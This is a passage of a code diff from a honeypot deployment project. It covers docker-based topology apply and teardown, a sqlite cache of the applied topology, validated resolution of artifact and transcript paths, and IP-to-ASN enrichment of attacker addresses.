    """Gatekeeper for an apply: check the hash first, then the structure.
    Returns the topology id once both checks pass.
    Raises:
        HashMismatch: the locally computed canonical hash differs from
            *version_hash*.
        ValidationError: validation reported at least one error.
    """
    computed = canonical_hash(hydrated)
    if computed != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{computed!r} — refusing to apply"
        )
    findings = _validate_topology(hydrated)
    if _validation_errors(findings):
        raise ValidationError(findings)
    return _topology_id(hydrated)
 async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
    """Remove whatever topology is pinned if it is not *topology_id*.
    The master is authoritative: any other pinned topology — fully
    applied, partially applied or drifted — is torn down before the new
    apply goes ahead.  Answering 409 instead would leave the agent stuck
    in a state only a human could resolve.
    """
    pinned = store.current()
    if pinned is None:
        return
    stale_id = pinned.topology_id
    if stale_id == topology_id:
        return
    log.info(
        "superseding topology %s with %s on master authority",
        stale_id, topology_id,
    )
    try:
        await teardown(stale_id, store)
    except Exception as exc:  # noqa: BLE001 — we still want to try applying
        log.warning(
            "best-effort teardown of superseded topology %s failed: %s",
            stale_id, exc,
        )
        # Drop the store row regardless, so a half-torn-down predecessor
        # cannot block the new apply.  Leftover docker objects surface via
        # the next heartbeat's observed block.
        store.clear(stale_id)
 def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Create the LAN bridges, write the compose file and start containers.
    Blocking — async callers must go through ``asyncio.to_thread``.
    Each LAN becomes a bridge network that is internal unless the LAN is
    flagged ``is_dmz``.
    Why ``--always-recreate-deps``: every decky service joins its base's
    netns via ``network_mode: container:<base>``, and that share is bound
    when the service starts.  If a base is recreated (e.g. ``ports:``
    changed after toggling ``forwards_l3``) while compose considers the
    services unchanged, they keep a stale netns FD for the destroyed base
    and sit in an empty namespace with only ``lo``, while external
    traffic hits a closed port on the live base.  Recreating dependents
    together with the base is the cheapest way to rule that race out.
    """
    compose_file = _topology_compose_path(topology_id)
    project_name = _topology_compose_project(topology_id)
    docker_client = docker.from_env()
    for lan_spec in hydrated["lans"]:
        create_bridge_network(
            docker_client,
            _topology_network_name(topology_id, lan_spec["name"]),
            lan_spec["subnet"],
            internal=not lan_spec["is_dmz"],
        )
    write_topology_compose(hydrated, compose_file)
    up_args = ("up", "--build", "-d", "--always-recreate-deps")
    _compose_with_retry(*up_args, compose_file=compose_file, project=project_name)
 async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
    store: TopologyStore,
 ) -> None:
    """Bring *hydrated* up on this agent, then record it in *store*.
    Steps, in order: hash + structural checks, teardown of a differing
    predecessor, materialisation in a worker thread, store update.
    Raises:
      HashMismatch: master and agent disagree on the canonical hash;
        docker is not touched.
      ValidationError: the topology fails structural validation.
      Any docker / compose error propagates; the endpoint maps it to 500
        and records the message on the store row.
    """
    tid = _check_hash_and_validate(hydrated, version_hash)
    await _teardown_superseded(tid, store)
    await asyncio.to_thread(_materialise, hydrated, tid)
    store.put(tid, version_hash, hydrated)
    lan_count = len(hydrated["lans"])
    log.info("topology %s applied on agent (%d LANs)", tid, lan_count)
 async def teardown(
    topology_id: str,
    store: TopologyStore,
 ) -> None:
    """Tear down *topology_id* on this agent.
    Idempotent: with no store row and no compose file it does nothing
    but still returns cleanly.
    Args:
        topology_id: topology to remove.
        store: local cache; its row for *topology_id* is cleared at the end.
    A failing ``compose down`` (``CalledProcessError``) is logged and the
    teardown continues; other errors propagate to the caller.
    """
    row = store.current()
    # Prefer the stored hydrated blob — it's what we applied with.  If the
    # row is gone (db wiped) or belongs to another topology we can still
    # compose-down via the lingering compose file, but have no LAN list to
    # remove bridges from.
    hydrated = row.hydrated if row and row.topology_id == topology_id else None
    # An error-marker row written by TopologyStore.record_error without a
    # hydrated blob decodes to ``{}`` — there is no "lans" key.  Indexing
    # it used to raise KeyError after compose-down, leaving the compose
    # file and the store row behind; treat it as "no known bridges".
    lans = (hydrated or {}).get("lans") or []
    compose_path = _topology_compose_path(topology_id)
    compose_project = _topology_compose_project(topology_id)
    client = docker.from_env()
    def _dismantle() -> None:
        # Blocking docker/compose work; runs in a worker thread below.
        if compose_path.exists():
            try:
                _compose(
                    "down", "--remove-orphans",
                    compose_file=compose_path, project=compose_project,
                )
            except subprocess.CalledProcessError as exc:
                log.warning(
                    "topology %s compose down failed (continuing): %s",
                    topology_id, exc,
                )
        if lans:
            for lan_name in _teardown_order(lans):
                net_name = _topology_network_name(topology_id, lan_name)
                remove_bridge_network(client, net_name)
        # missing_ok: nothing to do if the file never existed or was
        # already removed.
        compose_path.unlink(missing_ok=True)
    await asyncio.to_thread(_dismantle)
    store.clear(topology_id)
    log.info("topology %s torn down on agent", topology_id)
 def state(store: TopologyStore) -> dict[str, Any]:
    """Combine the stored row with a live docker observation.
    This is the shape the heartbeat embeds.  With no row in the store the
    four row-derived fields are ``None``; ``observed`` is always present
    and degrades to an ``{"error": ...}`` marker (truncated to 200
    characters) if docker cannot be queried.
    """
    row = store.current()
    try:
        live = observed(docker.from_env())
    except Exception as exc:  # noqa: BLE001 — docker socket may be gone
        live = {"error": str(exc)[:200]}
    # Start from an all-None snapshot, then overlay the stored row if any.
    snapshot: dict[str, Any] = dict.fromkeys(
        ("topology_id", "applied_version_hash", "applied_at", "last_error")
    )
    if row is not None:
        snapshot.update(
            topology_id=row.topology_id,
            applied_version_hash=row.applied_version_hash,
            applied_at=row.applied_at,
            last_error=row.last_error,
        )
    snapshot["observed"] = live
    return snapshot
 __all__ = ["apply", "teardown", "state", "HashMismatch"]
--- a/decnet/agent/topology_store.py
+++ b/decnet/agent/topology_store.py
@@ -0,0 +1,215 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent-side sqlite cache of the currently-applied topology.
 **This is a cache, not a source of truth.**  The master is the only
 authority for what the agent should be running.  This store exists so
 the agent can answer two questions quickly and offline:
 1. What topology did I last apply, and with what version hash?
 2. Is what docker is currently doing consistent with that?
 The hash goes out on every heartbeat; the master compares it to what
 it thinks this host should be running and schedules a re-push on
 mismatch.
 Why sqlite when the blob is JSON?  Consistent with
 :mod:`decnet.swarm.log_forwarder._OffsetStore` — single-row sqlite is
 the project-wide pattern for agent-local persistent state.  Keeps
 operational mental model small: "one state.db per thing".
 Design choices worth calling out:
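 - **One row, one topology.**  v1 only supports a single topology per
  agent.  Attempting to :meth:`put` a different ``topology_id`` while
  a row already exists raises :class:`AlreadyApplied`.  The apply path
  in :mod:`decnet.agent.topology_ops` tears down (or hard-clears) a
  differing predecessor before it calls :meth:`put`, so this guard is
  a last-resort invariant check; if it ever fires, the apply is
  rejected (409) and the old topology has to be torn down first.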
 - **No auto-restore on boot.**  The agent does NOT read this db at
  startup and try to re-apply.  Whatever docker has after a restart
  is what it has; the next heartbeat reports the truth and the
  master decides whether to re-push.  Same reason we don't sync
  mutations from agent → master anywhere else: split-brain is worse
  than temporary drift.
 """
 from __future__ import annotations
 import json
 import pathlib
 import sqlite3
 import time
 from dataclasses import dataclass
 from typing import Any, Optional
 class AlreadyApplied(RuntimeError):
    """Raised when a different topology is already pinned to this agent.
    :meth:`TopologyStore.put` raises it when the stored row's
    ``topology_id`` differs from the one being recorded."""
@dataclass(frozen=True)
 class AppliedRow:
    """Immutable view of the ``applied_topology`` row, as returned by
    :meth:`TopologyStore.current`."""
    # Identifier of the pinned topology (the table's primary key).
    topology_id: str
    # Version hash recorded by put(); the empty string on a marker row
    # inserted by record_error() before any successful apply.
    applied_version_hash: str
    # JSON-decoded hydrated topology; ``{}`` on a marker row inserted by
    # record_error() without a hydrated blob.
    hydrated: dict[str, Any]
    # Unix time in whole seconds set by put(); 0 on a record_error() marker row.
    applied_at: int
    # Last error message attached via record_error(); None after a clean put().
    last_error: Optional[str]
 class TopologyStore:
    """Single-row sqlite cache of the applied topology.
    Standard library only and fully synchronous (called from endpoints).
    Every write is committed immediately.
    """
    _SQL_CREATE = (
        "CREATE TABLE IF NOT EXISTS applied_topology ("
        " topology_id TEXT PRIMARY KEY,"
        " applied_version_hash TEXT NOT NULL,"
        " hydrated_blob_json TEXT NOT NULL,"
        " applied_at INTEGER NOT NULL,"
        " last_error TEXT)"
    )
    _SQL_SELECT_ONE = (
        "SELECT topology_id, applied_version_hash, hydrated_blob_json,"
        " applied_at, last_error FROM applied_topology LIMIT 1"
    )
    _SQL_UPSERT_APPLIED = (
        "INSERT INTO applied_topology"
        " (topology_id, applied_version_hash, hydrated_blob_json,"
        "  applied_at, last_error)"
        " VALUES (?, ?, ?, ?, NULL)"
        " ON CONFLICT(topology_id) DO UPDATE SET"
        "  applied_version_hash=excluded.applied_version_hash,"
        "  hydrated_blob_json=excluded.hydrated_blob_json,"
        "  applied_at=excluded.applied_at,"
        "  last_error=NULL"
    )
    _SQL_UPSERT_ERROR = (
        "INSERT INTO applied_topology"
        " (topology_id, applied_version_hash, hydrated_blob_json,"
        "  applied_at, last_error)"
        " VALUES (?, '', ?, 0, ?)"
        " ON CONFLICT(topology_id) DO UPDATE SET"
        "  last_error=excluded.last_error,"
        "  hydrated_blob_json=CASE"
        "   WHEN applied_topology.hydrated_blob_json='{}'"
        "   THEN excluded.hydrated_blob_json"
        "   ELSE applied_topology.hydrated_blob_json END"
    )
    _SQL_DELETE = "DELETE FROM applied_topology WHERE topology_id=?"
    def __init__(self, db_path: pathlib.Path) -> None:
        """Open (creating if needed) the sqlite file at *db_path* and make
        sure the ``applied_topology`` table exists."""
        db_path.parent.mkdir(parents=True, exist_ok=True)
        # check_same_thread=False: Starlette/FastAPI runs sync endpoint
        # bodies on a worker thread distinct from where `app` is imported.
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        conn = sqlite3.connect(str(db_path), check_same_thread=False)
        conn.row_factory = sqlite3.Row
        self._conn = conn
        self._write(self._SQL_CREATE)
    def _write(self, sql: str, params: tuple = ()) -> None:
        """Execute one statement and commit it straight away."""
        self._conn.execute(sql, params)
        self._conn.commit()
    # ----------------------------------------------------------------- reads
    def current(self) -> Optional[AppliedRow]:
        """Fetch the pinned topology row, or ``None`` when the agent is idle."""
        record = self._conn.execute(self._SQL_SELECT_ONE).fetchone()
        if record is not None:
            return AppliedRow(
                topology_id=record["topology_id"],
                applied_version_hash=record["applied_version_hash"],
                hydrated=json.loads(record["hydrated_blob_json"]),
                applied_at=int(record["applied_at"]),
                last_error=record["last_error"],
            )
        return None
    # ---------------------------------------------------------------- writes
    def put(
        self,
        topology_id: str,
        applied_version_hash: str,
        hydrated: dict[str, Any],
    ) -> None:
        """Record a successfully applied topology.
        Raises :class:`AlreadyApplied` when a row for a *different*
        topology exists.  Recording the same ``topology_id`` again
        refreshes hash, blob and timestamp and resets ``last_error``
        (idempotent re-push).
        """
        pinned = self.current()
        if pinned is not None and pinned.topology_id != topology_id:
            raise AlreadyApplied(
                f"agent already has topology {pinned.topology_id!r}; "
                f"cannot apply {topology_id!r}"
            )
        params = (
            topology_id,
            applied_version_hash,
            json.dumps(hydrated, sort_keys=True),
            int(time.time()),
        )
        self._write(self._SQL_UPSERT_APPLIED, params)
    def record_error(
        self,
        topology_id: str,
        message: str,
        hydrated: Optional[dict[str, Any]] = None,
    ) -> None:
        """Attach *message* as the last error for *topology_id*.
        When no apply has succeeded yet for this topology a marker row is
        inserted, so a failure *during* the first materialise (before
        put() is reached) still shows up in GET /topology/state and in
        the next heartbeat.  The marker carries an empty
        ``applied_version_hash`` so the master's heartbeat check sees a
        hash mismatch and schedules a resync.
        A supplied *hydrated* blob is stored only while the row's blob is
        still the empty ``{}`` placeholder; it lets a later teardown walk
        the LAN list — otherwise a partial deploy strands containers and
        bridges with no breadcrumb back to them.
        """
        if hydrated:
            blob = json.dumps(hydrated, sort_keys=True)
        else:
            blob = "{}"
        self._write(self._SQL_UPSERT_ERROR, (topology_id, blob, message))
    def clear(self, topology_id: str) -> None:
        """Delete the row for *topology_id* (post-teardown).
        Deleting a row that does not exist is a no-op, which keeps
        teardown idempotent.
        """
        self._write(self._SQL_DELETE, (topology_id,))
    def close(self) -> None:
        """Close the underlying sqlite connection."""
        self._conn.close()
 # --------------------------------------------------- live docker observation
 def observed(docker_client: Any) -> dict[str, Any]:
    """Report which DECNET bridges and containers docker lists right now.
    The result is compact enough for the heartbeat to ship, letting the
    master cross-check ``applied_version_hash`` against reality (a
    matching hash with missing bridges is still drift).
    Returns ``{"bridges": [...], "containers": [...]}`` with both name
    lists sorted: bridge-driver networks named ``decnet-topology-*`` and
    containers named ``decnet-*`` from ``containers.list(all=False)``.
    Best-effort: any exception is turned into ``{"error": <message>}``
    (truncated to 200 characters) instead of being raised — the agent
    still needs to heartbeat, and the master can treat ``error`` as
    "unknown, re-push".
    """
    try:
        bridge_names = []
        for net in docker_client.networks.list():
            if net.attrs.get("Driver") != "bridge":
                continue
            if net.name.startswith("decnet-topology-"):
                bridge_names.append(net.name)
        container_names = []
        for ctr in docker_client.containers.list(all=False):
            if ctr.name.startswith("decnet-"):
                container_names.append(ctr.name)
        bridge_names.sort()
        container_names.sort()
        return {"bridges": bridge_names, "containers": container_names}
    except Exception as exc:  # noqa: BLE001 — best-effort observation
        return {"error": str(exc)[:200]}
 __all__ = ["TopologyStore", "AppliedRow", "AlreadyApplied", "observed"]
--- a/decnet/archetypes.py
+++ b/decnet/archetypes.py
@@ -1,3 +1,4 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 Machine archetype profiles for DECNET deckies.
--- a/decnet/artifacts/init.py
+++ b/decnet/artifacts/init.py
@@ -0,0 +1 @@
 """Artifact storage helpers shared between the web router and TTP workers."""
--- a/decnet/artifacts/paths.py
+++ b/decnet/artifacts/paths.py
@@ -0,0 +1,86 @@
 """
 Shared on-disk artifact path resolution.
 Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
 quarantine tree:
    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
 Two callers need to translate ``(decky, stored_as, service)`` into a
 concrete ``Path`` rooted under that tree:
 * The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
  download for the dashboard.
 * The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
  reads the stored ``.eml`` at tag-time so body-aware predicates
  (R0047 BEC, R0048 macro) don't need raw body text on the bus.
 Both callers share the same validation rules and the same
 defence-in-depth symlink-escape check; this module is the single
 implementation. It is auth-agnostic — wrappers layer authentication
 where appropriate (the router does ``require_admin``, the lifter does
 not).
 """
 from __future__ import annotations
 import os
 import re
 from pathlib import Path
 # decky names come from the deployer — lowercase alnum plus hyphens.
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 # Services that own an artifacts subdir. Kept explicit so a caller
 # can't pivot into arbitrary subpaths via a query string or bus payload.
 _ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
 # stored_as is assembled by the capturing template as:
 #   ${ts}_${sha:0:12}_${base}
 # where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
 # and base is the original filename's basename. Keep the filename charset
 # tight but allow common punctuation dropped files actually use.
 _STORED_AS_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
 )
 # Module-level so tests can monkeypatch. Override via env in production
 # (the systemd unit sets this) — the prod path matches the bind mount
 # declared in decnet/services/{ssh,smtp}.py.
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
 )
 class ArtifactPathError(ValueError):
    """Raised when (decky, stored_as, service) fails validation or escapes
    the artifacts root.
    Raised by :func:`resolve_artifact_path`; subclasses ``ValueError``.
    The router catches this and re-raises HTTPException(400). The lifter
    catches it and treats the event as having no body available (no-tag).
    """
 def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Turn ``(decky, stored_as, service)`` into a path under the artifacts root.
    The inputs are validated in the order service, decky, stored_as; the
    resolved path is then checked to still sit inside the resolved root.
    Raises :class:`ArtifactPathError` on any violation.  Existence of the
    file is NOT checked — callers handle that themselves (404 for the
    router, no-tag for the lifter).
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if _DECKY_RE.fullmatch(decky) is None:
        raise ArtifactPathError("invalid decky name")
    if _STORED_AS_RE.fullmatch(stored_as) is None:
        raise ArtifactPathError("invalid stored_as")
    base = ARTIFACTS_ROOT.resolve()
    target = base.joinpath(decky, service, stored_as).resolve()
    # Defence-in-depth: the regexes already reject `..`, but a symlink or
    # odd filesystem state must not be able to lead outside the root.
    contained = target == base or base in target.parents
    if not contained:
        raise ArtifactPathError("path escapes artifacts root")
    return target
--- a/decnet/artifacts/shards.py
+++ b/decnet/artifacts/shards.py
@@ -0,0 +1,129 @@
 """Shared asciinema shard helpers.
 Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
 so non-router callers (the BEHAVE-SHELL session-ended handler in
 ``decnet/profiler/worker.py``, the collector's session aggregator)
 can resolve shard paths without crossing the layer boundary into the
 FastAPI router.
 Functions here speak in :class:`ValueError` — callers that want HTTP
 semantics translate at the boundary. The router wrappers keep their
 existing ``HTTPException`` behaviour for backwards compatibility.
 PII boundary unchanged: shards live on disk; this module returns
 :class:`pathlib.Path` pointers, never byte content. The ``get_index``
 cache stores byte offsets and lengths only.
 """
 from __future__ import annotations
 import os
 import re
 from collections import OrderedDict
 from pathlib import Path
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
 )
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 _SERVICE_RE = re.compile(r"^(ssh|telnet)$")
 _SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
 _SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
 # (path, mtime_ns) → {sid: [(offset, length), ...]}
 _INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
    OrderedDict()
 )
 _CACHE_MAX = 32
 def validate_names(decky: str, service: str) -> None:
    """Reject ``decky`` / ``service`` values that do not fully match their
    allow-list patterns.
    ``decky`` is checked first. Raises :class:`ValueError` naming the
    offending value; returns ``None`` when both are acceptable.
    """
    if _DECKY_RE.fullmatch(decky) is None:
        raise ValueError(f"invalid decky name: {decky!r}")
    if _SERVICE_RE.fullmatch(service) is None:
        raise ValueError(f"invalid service: {service!r}")
 def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Return the resolved path of
    ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``.
    ``decky`` / ``service`` go through :func:`validate_names`;
    ``shard_name`` must be a ``sessions-YYYY-MM-DD.jsonl`` basename. The
    resolved result must stay at or below the resolved artifacts root.
    Raises :class:`ValueError` on any invalid input or escape attempt.
    """
    validate_names(decky, service)
    if _SHARD_BASENAME_RE.fullmatch(shard_name) is None:
        raise ValueError(f"invalid shard name: {shard_name!r}")
    base = ARTIFACTS_ROOT.resolve()
    target = base.joinpath(decky, service, "transcripts", shard_name).resolve()
    contained = target == base or base in target.parents
    if not contained:
        raise ValueError(f"path escapes artifacts root: {target}")
    return target
 def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    index: dict[str, list[tuple[int, int]]] = {}
    with path.open("rb") as f:
        offset = 0
        for line in f:
            length = len(line)
            m = _SID_LINE_RE.search(line)
            if m:
                sid = m.group(1).decode("ascii")
                index.setdefault(sid, []).append((offset, length))
            offset += length
    return index
 def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)`` for a shard.
    Indexes are memoised under ``(path, mtime_ns)``, so a modified shard
    gets a fresh index. The cache is an LRU bounded by ``_CACHE_MAX``:
    hits move to the newest end, overflow is evicted from the oldest end.
    """
    info = path.stat()
    cache_key = (str(path), info.st_mtime_ns)
    cached = _INDEX_CACHE.get(cache_key)
    # ``is None`` rather than truthiness: an empty index is a valid hit.
    if cached is None:
        cached = _build_index(path)
        _INDEX_CACHE[cache_key] = cached
    _INDEX_CACHE.move_to_end(cache_key)
    for _ in range(len(_INDEX_CACHE) - _CACHE_MAX):
        _INDEX_CACHE.popitem(last=False)
    return cached, info.st_size
 def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Locate the ``sessions-YYYY-MM-DD.jsonl`` shard that contains ``sid``.
    Shards under ``ARTIFACTS_ROOT/{decky}/{service}/transcripts`` are
    scanned newest-first (reverse path order) because most lookups are
    for recent sessions. Per-shard indexes come from :func:`get_index`,
    so repeated calls are cheap until a shard's mtime changes.
    Returns the shard path, or ``None`` when no shard claims the sid,
    the transcripts dir is missing / unreadable / outside the root, or
    path resolution itself fails. Filesystem-level errors never
    propagate — callers treat ``None`` as "skip".
    Raises :class:`ValueError` (from :func:`validate_names`) when
    ``decky`` / ``service`` are malformed.
    """
    validate_names(decky, service)
    try:
        # resolve() touches the filesystem too, so it lives inside the
        # guard: it can raise OSError, and on Python < 3.13 it reports
        # symlink loops as RuntimeError.
        root = ARTIFACTS_ROOT.resolve()
        transcripts_dir = (root / decky / service / "transcripts").resolve()
        if root not in transcripts_dir.parents:
            return None
        if not transcripts_dir.is_dir():
            return None
        entries = list(transcripts_dir.iterdir())
    except (OSError, RuntimeError):
        return None
    shards = sorted(
        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
        reverse=True,
    )
    for shard in shards:
        try:
            index, _size = get_index(shard)
        except OSError:
            # Unreadable or vanished shard: skip it, keep looking.
            continue
        if sid in index:
            return shard
    return None
--- a/decnet/asn/__init__.py
+++ b/decnet/asn/__init__.py
@@ -0,0 +1,93 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 IP-to-ASN enrichment — maps attacker IPs to BGP-announced AS numbers and
 org names for attacker intelligence.
 Public surface mirrors :mod:`decnet.geoip` so callers can compose them:
 * :func:`get_lookup` — returns the singleton :class:`AsnLookup`.
 * :func:`enrich_ip` — takes an IP string, returns
  ``(asn_int, asn_name, bgp_prefix, provider_name)`` or ``(None, None, None, None)``.
 Provider selection goes through :func:`~decnet.asn.factory.get_provider`
 (env ``DECNET_ASN_PROVIDER``, default ``iptoasn``). Direct imports of
 concrete providers are forbidden — mirrors the ``get_bus`` /
 ``get_repository`` rule.
 """
 from __future__ import annotations
 import os
 import time
 from typing import Optional, Tuple
 from decnet.asn.factory import get_provider
 from decnet.asn.lookup import AsnLookup
 from decnet.asn.paths import ASN_ROOT
 # 24 h — iptoasn refreshes daily.
 REFRESH_INTERVAL_S = 86_400
 # Minimum spacing between *automatic* refresh attempts while the on-disk
 # data stays stale (e.g. the host has no egress). Without it every
 # lookup would re-trigger a blocking download and a full index rebuild.
 REFRESH_RETRY_BACKOFF_S = 300
 _lookup: Optional[AsnLookup] = None
 _provider_name: Optional[str] = None
 # time.monotonic() of the last refresh attempt; None = never attempted.
 _last_refresh_attempt: Optional[float] = None
 def get_lookup(*, force_refresh: bool = False) -> AsnLookup:
    """Return the cached :class:`AsnLookup`, building it on first use.
    If the provider's data files are missing or older than
    ``REFRESH_INTERVAL_S`` seconds, refresh before building. Automatic
    refreshes are attempted at most once per ``REFRESH_RETRY_BACKOFF_S``
    seconds, so a refresh that keeps failing does not run on every call.
    In between, the existing lookup (or one built from whatever is on
    disk) keeps being served.
    Pass ``force_refresh=True`` to bypass both the age check and the
    backoff (used by a future ``decnet asn refresh`` CLI command).
    Exceptions raised by the provider's ``refresh`` / ``build_lookup``
    propagate to the caller.
    """
    global _lookup, _provider_name, _last_refresh_attempt
    provider = get_provider()
    if provider.name != _provider_name:
        # Different backend than last time: neither the cached lookup nor
        # the backoff window belongs to it.
        _lookup = None
        _last_refresh_attempt = None
    _provider_name = provider.name
    refresh_due = force_refresh
    if not refresh_due and _files_stale(provider):
        refresh_due = (
            _last_refresh_attempt is None
            or time.monotonic() - _last_refresh_attempt >= REFRESH_RETRY_BACKOFF_S
        )
    if refresh_due:
        # Stamp before calling out so a raising refresh still backs off.
        _last_refresh_attempt = time.monotonic()
        provider.refresh()
        _lookup = None  # rebuild below from the refreshed files
    if _lookup is None:
        _lookup = provider.build_lookup()
    return _lookup
 def enrich_ip(ip: str) -> Tuple[Optional[int], Optional[str], Optional[str], Optional[str]]:
    """Resolve ``ip`` to ``(asn, as_name, bgp_prefix, provider_name)``.
    Returns ``(None, None, None, None)`` when enrichment is disabled, the
    address has no match, or anything at all goes wrong — this function
    never raises, so the caller (profiler) can upsert the attacker row
    regardless.
    Setting ``DECNET_ASN_ENABLED=false`` (case-insensitive) skips the
    lookup entirely, which is handy for tests / agent hosts / ops that
    want enrichment off without touching provider config.
    """
    miss = (None, None, None, None)
    enabled_flag = os.environ.get("DECNET_ASN_ENABLED", "true")
    if enabled_flag.lower() == "false":
        return miss
    try:
        info = get_lookup().asn(ip)
        if info is not None:
            # Empty AS names are reported as None, not "".
            return (info.asn, info.name or None, info.prefix, _provider_name or "unknown")
    except Exception:
        pass
    return miss
 def _files_stale(provider) -> bool:
    """True when the provider has no fresh data on disk.
    Same semantics as :func:`decnet.geoip._files_stale`: a partial
    cache still produces correct answers for the ranges it covers.
    """
    paths = provider.data_paths()
    if not paths:
        return True
    now = time.time()
    for p in paths:
        if p.exists() and now - p.stat().st_mtime <= REFRESH_INTERVAL_S:
            return False
    return True
 __all__ = ["get_lookup", "enrich_ip", "ASN_ROOT", "REFRESH_INTERVAL_S"]
--- a/decnet/asn/base.py
+++ b/decnet/asn/base.py
@@ -0,0 +1,34 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """ASN provider protocol — mirror of :mod:`decnet.geoip.base`.
 Concrete providers (e.g. :mod:`decnet.asn.iptoasn`) implement this.
 Callers must go through :func:`decnet.asn.factory.get_provider`; never
 import a concrete provider class directly.
 """
 from __future__ import annotations
 from abc import ABC, abstractmethod
 from pathlib import Path
 from typing import Sequence
 from decnet.asn.lookup import AsnLookup
 class Provider(ABC):
    """Contract that every IP→ASN data source implements."""
    #: Short tag written to ``Attacker.asn_source`` (e.g. ``'iptoasn'``).
    name: str
    @abstractmethod
    def data_paths(self) -> Sequence[Path]:
        """List the files this provider manages. The list feeds staleness
        detection; its order carries no meaning."""
    @abstractmethod
    def refresh(self) -> None:
        """Download or regenerate the provider's raw data files."""
    @abstractmethod
    def build_lookup(self) -> AsnLookup:
        """Parse the files on disk into a ready-to-query lookup."""
--- a/decnet/asn/factory.py
+++ b/decnet/asn/factory.py
@@ -0,0 +1,40 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """ASN provider factory — mirror of :mod:`decnet.geoip.factory`.
 Dispatch key: ``DECNET_ASN_PROVIDER`` (default ``iptoasn``). Lazy
 singleton.
 """
 from __future__ import annotations
 import os
 from typing import Optional
 from decnet.asn.base import Provider
 _cached: Optional[Provider] = None
 _cached_key: Optional[str] = None
 def get_provider() -> Provider:
    """Return the process-wide :class:`Provider` for the configured backend.
    The backend key is read from ``DECNET_ASN_PROVIDER`` (lower-cased,
    default ``iptoasn``). The instance is cached together with its key,
    so a changed env value yields a new provider on the next call.
    Raises :class:`ValueError` for an unknown key.
    """
    global _cached, _cached_key
    wanted = os.environ.get("DECNET_ASN_PROVIDER", "iptoasn").lower()
    if _cached is None or _cached_key != wanted:
        if wanted != "iptoasn":
            raise ValueError(f"Unsupported ASN provider: {wanted!r}")
        # Imported lazily, only once this backend is actually selected.
        from decnet.asn.iptoasn.provider import IptoasnProvider
        _cached, _cached_key = IptoasnProvider(), wanted
    return _cached
 def reset_cache() -> None:
    """Drop the cached provider and its key so the next
    :func:`get_provider` call builds a new one — tests swap providers via
    the env var."""
    global _cached, _cached_key
    _cached = _cached_key = None
--- a/decnet/asn/iptoasn/__init__.py
+++ b/decnet/asn/iptoasn/__init__.py
@@ -0,0 +1,10 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn.com IP→ASN provider.
 Daily-refreshed gzipped TSV dump of the global BGP table, derived from
 RIPE RIS. Released into the public domain by upstream — no attribution
 required, no UA mandate, no terms to violate.
 Direct imports of :class:`IptoasnProvider` are discouraged — go through
 :func:`decnet.asn.factory.get_provider`.
 """
--- a/decnet/asn/iptoasn/fetch.py
+++ b/decnet/asn/iptoasn/fetch.py
@@ -0,0 +1,64 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn.com bulk dump download.
 One file: ``ip2asn-v4.tsv.gz``, ~5 MB compressed, refreshed daily.
 Pulled over HTTPS with the same generic UA the geoip RIR fetcher uses
 (stealth: never identify as DECNET — public-data scrapers correlated to
 honeypot operator egress is the threat model).
 """
 from __future__ import annotations
 import logging
 import shutil
 import urllib.request
 from pathlib import Path
 from typing import Tuple
 logger = logging.getLogger("decnet.asn.iptoasn.fetch")
 # Mirror the (name, url) tuple shape of geoip.rir.fetch so test
 # harnesses can swap one for the other.
 # ``name`` doubles as the on-disk basename: fetch_all writes each entry
 # to ``{name}.tsv.gz`` inside the destination directory.
 IPTOASN_SOURCES: Tuple[Tuple[str, str], ...] = (
    ("ip2asn-v4", "https://iptoasn.com/data/ip2asn-v4.tsv.gz"),
 )
 # Generic UA — matches geoip.rir.fetch. iptoasn.com explicitly releases
 # the data into the public domain and does NOT require an identifying UA,
 # so we keep DECNET stealth instead of advertising.
 _USER_AGENT = "Mozilla/5.0 (compatible; fetch/1.0)"
 # Timeout, in seconds, passed to ``urllib.request.urlopen`` for each download.
 _TIMEOUT_S = 60
 def fetch_all(dest: Path) -> list[Path]:
    """Download every entry of ``IPTOASN_SOURCES`` into *dest*.
    ``dest`` is created if needed. Each file is first written to
